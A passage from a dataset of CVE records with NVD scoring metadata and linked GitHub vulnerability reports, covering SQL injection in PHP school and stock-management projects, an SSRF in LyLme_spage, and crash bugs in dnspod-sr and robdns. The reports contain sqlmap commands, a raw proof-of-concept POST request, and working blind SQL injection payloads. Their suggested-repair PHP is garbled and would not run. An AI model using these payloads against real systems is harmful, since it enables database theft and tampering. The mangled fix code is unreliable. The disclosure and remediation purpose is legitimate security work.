blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'user_email' parameter ## Payload: <img width="365" alt="2" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/da0fb05b-ef18-43cd-b24f-a880f5c3b547"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u 192.168.210.199:1219/e-learningsystem/login.php --data="user_email=123231&user_pass=21312312&btnLogin=" --method=POST --batch --dbs ``` <img width="264" alt="3" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/8bca9432-efdc-4b89-97e5-ea1e166ff996"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Learning Management System Project In PHP With Source Code v1.0 login.php SQL injection
https://api.github.com/repos/L1OudFd8cl09/CVE/issues/2/comments
0
2024-06-03T01:09:10Z
2024-06-03T01:22:04Z
https://github.com/L1OudFd8cl09/CVE/issues/2
2,329,970,652
2
6,046
CVE-2024-5588
2024-06-02T15:15:08.230
A vulnerability was found in itsourcecode Learning Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file processscore.php. The manipulation of the argument LessonID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266839.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/12" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266839" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266839" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.347576" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266839" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266839" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.347576" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:learning_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2C73EA1D-9BD1-42A6-8A1B-5517519304A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Learning Management System Project In PHP With Source Code v1.0 processscore.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Learning Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + mask71 ## Vulnerable File + processscore.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'processscore.php' file of the 'Learning Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "LessonID" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="496" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/8d0dbd75-1384-468d-9ff7-e95f3046f7d6"> ## Impact + Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "LessonID" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Learning Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /e-learningsystem/processscore.php HTTP/1.1 Host: 192.168.210.199:1219 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: http://192.168.210.199:1219 Connection: close Referer: http://192.168.210.199:1219/e-learningsystem/index.php?q=question&id=13 Priority: u=1 LessonID=13&btnSubmit= ``` ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'LessonID' parameter ## Payload: <img width="471" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/0a35dfda-fb29-43ea-b15c-e063723257c9"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u 192.168.210.199:1219/e-learningsystem/processscore.php --data="LessonID=13&btnSubmit=" --method=POST --batch --dbs ``` <img width="471" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2f22cbdb-8011-45e9-b219-b0dd4edd34ad"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Learning Management System Project In PHP With Source Code v1.0 processscore.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/12/comments
0
2024-05-31T04:03:32Z
2024-05-31T04:03:32Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/12
2,326,918,435
12
6,047
CVE-2024-36675
2024-06-04T22:15:10.740
LyLme_spage v1.9.5 is vulnerable to Server-Side Request Forgery (SSRF) via the get_head function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LyLme/lylme_spage/issues/92" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LyLme/lylme_spage/issues/92" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "2B5D86CA-58F2-4545-9D9D-0BA9967C9506", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/LyLme/lylme_spage/issues/92
[ "Exploit", "Issue Tracking" ]
github.com
[ "LyLme", "lylme_spage" ]
# Summary An SSRF (Server-Side Request Forgery) vulnerability was identified in the LyLme_spage version 1.9.5. This vulnerability allows internal network requests to be initiated and sensitive information to be retrieved by accessing a specific URL. # Details The vulnerability resides in the get_head function which is used to fetch and process web page titles, icons, descriptions, and keywords. However, through manipulation of the URL parameter accessed through http://192.168.0.10:1006/apply/index.php?url=[malicious_URL], an attacker can force the application to make arbitrary requests to internal services. https://github.com/LyLme/lylme_spage/blob/b7c430a49e8b247ddb04401b1176157c10d52948/include/function.php#L211-L265 This is made possible due to insufficient validation of the user-supplied URL, allowing for the specification of arbitrary URLs that the server will then request data from. Consequently, this behavior can be exploited to interact with and extract information from services that are only accessible from the server's internal network. # Impact An attacker can exploit this vulnerability to conduct SSRF attacks, leading to unauthorized access to internal network services. This might result in the disclosure of sensitive information, interaction with internal APIs, or further exploitation depending on the nature of the accessible services. The impact is considerably high since it directly affects the confidentiality and integrity of the system. # Proof of Concept (PoC) ``` http(s)://ip:port/apply/index.php?url=malicious_URL ``` ![image](https://github.com/LyLme/lylme_spage/assets/66168888/9de358e0-f412-4a86-a8d6-970ff7cbf0b7)
SSRF Vulnerability in LyLme_spage v1.9.5
https://api.github.com/repos/LyLme/lylme_spage/issues/92/comments
1
2024-05-22T05:41:55Z
2025-01-29T03:29:05Z
https://github.com/LyLme/lylme_spage/issues/92
2,309,618,181
92
6,048
CVE-2024-36779
2024-06-06T13:15:31.590
Sourcecodester Stock Management System v1.0 is vulnerable to SQL Injection via editCategories.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stock_management_system_project:stock_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F48DAD43-EB1C-4267-B97D-63BBFF86C70F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Stock Management System in PHP 1.0 editCategories.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Stock Management System in PHP ## Vendor Homepage + https://www.sourcecodester.com/php/14366/stock-management-system-php.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xiao huangxin ## Vulnerable File + editCategories.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the `editCategories.php` file of the `Stock Management System` project. This issue arises because user inputs `editCategoriesName`, `editCategoriesStatus`, and `editCategoriesId` from `$_POST['editCategoriesName']`, `$_POST['editCategoriesStatus']`, and `$_POST['editCategoriesId']` are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations. ## Vulnerability code snippets ```php <?php require_once 'core.php'; $valid['success'] = array('success' => false, 'messages' => array()); if($_POST) { $brandName = $_POST['editCategoriesName']; $brandStatus = $_POST['editCategoriesStatus']; $categoriesId = $_POST['editCategoriesId']; $sql = "UPDATE categories SET categories_name = '$brandName', categories_active = '$brandStatus' WHERE categories_id = '$categoriesId'"; if($connect->query($sql) === TRUE) { $valid['success'] = true; $valid['messages'] = "Successfully Updated"; } else { $valid['success'] = false; $valid['messages'] = "Error while updating the categories"; } $connect->close(); echo json_encode($valid); } // /if $_POST ``` + In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Stock Management System," xiao huangxin discovered a critical SQL injection vulnerability in the `editCategories.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + MySQL >= 5.0.12 AND time-based blind (query SLEEP) ## Vulnerability location: + 'editCategoriesName' parameter ## Payload: ```sql editCategoriesName=1' AND 2603=(SELECT (CASE WHEN (2603=2603) THEN 2603 ELSE (SELECT 4614 UNION SELECT 5853) END))-- -&editCategoriesStatus=1&editCategoriesId=7 editCategoriesName=1' AND (SELECT 9162 FROM (SELECT(SLEEP(5)))eYsz)-- sSlF&editCategoriesStatus=1&editCategoriesId=7 ``` ```makefile Parameter: editCategoriesName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: editCategoriesName=1' AND 2603=(SELECT (CASE WHEN (2603=2603) THEN 2603 ELSE (SELECT 4614 UNION SELECT 5853) END))-- -&editCategoriesStatus=1&editCategoriesId=7 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editCategoriesName=1' AND (SELECT 9162 FROM (SELECT(SLEEP(5)))eYsz)-- sSlF&editCategoriesStatus=1&editCategoriesId=7 ``` + ![1](https://github.com/CveSecLook/cve/assets/148504790/3c9ca1f8-5833-4d15-8c52-f833704c25cb) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://localhost/stock/php_action/editCategories.php" --data="editCategoriesName=1&editCategoriesStatus=1&editCategoriesId=7" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump ``` + ![2](https://github.com/CveSecLook/cve/assets/148504790/e414a744-e5a7-4904-997f-bc1e45f43ac3) + ![3](https://github.com/CveSecLook/cve/assets/148504790/fe14df7e-7519-4ddf-b6e2-c4bd445a30c2) + ![4](https://github.com/CveSecLook/cve/assets/148504790/cef9a15b-bae2-487f-a355-2b141b12689f) + ![5](https://github.com/CveSecLook/cve/assets/148504790/ef96af11-0f50-45a5-a485-0b83cac4e039) + ![6](https://github.com/CveSecLook/cve/assets/148504790/79905b76-84a5-4017-abb2-5d66913bb266) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. ```PHP //Create database connection $conn=new mysqli ($servername, $username, $password, $dbname); //Check connection If ($conn ->connect_error){ Die ("Connection failed:")$ conn->connect_error); } //Prepare and bind $stmt=$conn ->prepare ("UPDATE categories SET name=?")?, status = ? WHERE id = ? ); $stmt ->bind_param ("ssi", $editCategoriesName, $editCategoriesStatus, $editCategoriesId); //Set parameters and execute $editCategoriesName=$POST ['editCategoriesName ']; $editCategoriesStatus=$POST ['editCategoriesStatus']; $editCategoriesId=$POST ['editCategoriesId ']; $stmt ->execute(); Echo "Record updated successfully"; $stmt ->close(); $conn ->close(); ``` 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. For example, PHP's' filter_input 'function can be used to validate and filter input data. ```PHP $editCategoriesName=filter_input (Input-Post, 'editCategoriesName', FILTER_SANITIZE_STRING); $editCategoriesStatus=filter_input (Input-Post, 'editCategoriesStatus', FILTER_VALIDATE_INT); $editCategoriesId=filter_input (Input-Post, 'editCategoriesId', FILTER_VALIDATE_INT); If ($editCategoriesName===false | | $editCategoriesStatus==false | | $editCategoriesId===false){ Die ("Invalid input"); } //Continue processing database operations ``` 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
SourceCodester Stock Management System in PHP 1.0 editCategories.php SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/42/comments
0
2024-05-24T00:25:31Z
2024-05-24T04:30:13Z
https://github.com/CveSecLook/cve/issues/42
2,314,064,021
42
6,049
CVE-2024-22524
2024-06-06T22:15:10.043
dnspod-sr 0dfbd37 is vulnerable to buffer overflow.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/DNSPod/dnspod-sr/issues/60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/DNSPod/dnspod-sr/issues/60" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dnspod:dnspod_security_recursive:-:*:*:*:*:*:*:*", "matchCriteriaId": "253A7159-E2CC-4D48-BC94-DE5A7C6D28A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/DNSPod/dnspod-sr/issues/60
[ "Exploit", "Issue Tracking" ]
github.com
[ "DNSPod", "dnspod-sr" ]
in https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/src/init.c#L186 if `s->logpath` is not set, https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/src/io.c#L461 will use memcpy with a null pointer and will cause <img width="531" alt="image" src="https://github.com/DNSPod/dnspod-sr/assets/66028849/16f1ccd2-329b-4ce1-97df-32e37c94f828">
global buffer overflow
https://api.github.com/repos/DNSPod/dnspod-sr/issues/60/comments
0
2023-12-27T03:45:53Z
2023-12-27T03:45:53Z
https://github.com/DNSPod/dnspod-sr/issues/60
2,056,877,351
60
6,050
CVE-2024-22525
2024-06-06T22:15:10.127
dnspod-sr 0dfbd37 contains a SEGV.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/DNSPod/dnspod-sr/issues/61" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/DNSPod/dnspod-sr/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dnspod:dnspod_security_recursive:-:*:*:*:*:*:*:*", "matchCriteriaId": "253A7159-E2CC-4D48-BC94-DE5A7C6D28A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/DNSPod/dnspod-sr/issues/61
[ "Exploit", "Issue Tracking" ]
github.com
[ "DNSPod", "dnspod-sr" ]
in https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/tool/client.c#L81 if given a null argv[1], a segv will be triggered by memcpy <img width="1116" alt="image" src="https://github.com/DNSPod/dnspod-sr/assets/66028849/82288557-16a5-49ce-8594-ceca5a85850a">
SEGV on client
https://api.github.com/repos/DNSPod/dnspod-sr/issues/61/comments
0
2023-12-27T04:02:23Z
2023-12-27T04:02:23Z
https://github.com/DNSPod/dnspod-sr/issues/61
2,056,885,098
61
6,051
CVE-2024-24192
2024-06-06T22:15:10.213
robdns commit d76d2e6 was discovered to contain a heap overflow via the component block->filename at /src/zonefile-insertion.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/robertdavidgraham/robdns/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/robertdavidgraham/robdns/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:robertdavidgraham:robdns:2015-12-09:*:*:*:*:*:*:*", "matchCriteriaId": "468F3841-3FFD-4B95-A5AB-5BE25DB6066D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/robertdavidgraham/robdns/issues/8
[ "Issue Tracking" ]
github.com
[ "robertdavidgraham", "robdns" ]
in line https://github.com/robertdavidgraham/robdns/blob/d76d2e6817ebefe240c667aecdc478d7e3fec586/src/zonefile-insertion.c#L161 in some case the size of `block->filename` will surpass the size of `parser->src.filename`, which will leak the heap information. This can be detected by ASAN. <img width="612" alt="image" src="https://github.com/robertdavidgraham/robdns/assets/156593391/257cabb6-2a71-4939-8293-645e88af4bc5">
heap buffer overflow
https://api.github.com/repos/robertdavidgraham/robdns/issues/8/comments
1
2024-01-14T14:48:53Z
2024-10-14T02:09:51Z
https://github.com/robertdavidgraham/robdns/issues/8
2,080,758,839
8
6,052
CVE-2024-5733
2024-06-07T12:15:09.190
A vulnerability was found in itsourcecode Online Discussion Forum 1.0. It has been rated as critical. This issue affects some unknown processing of the file register_me.php. The manipulation of the argument eaddress leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267407.
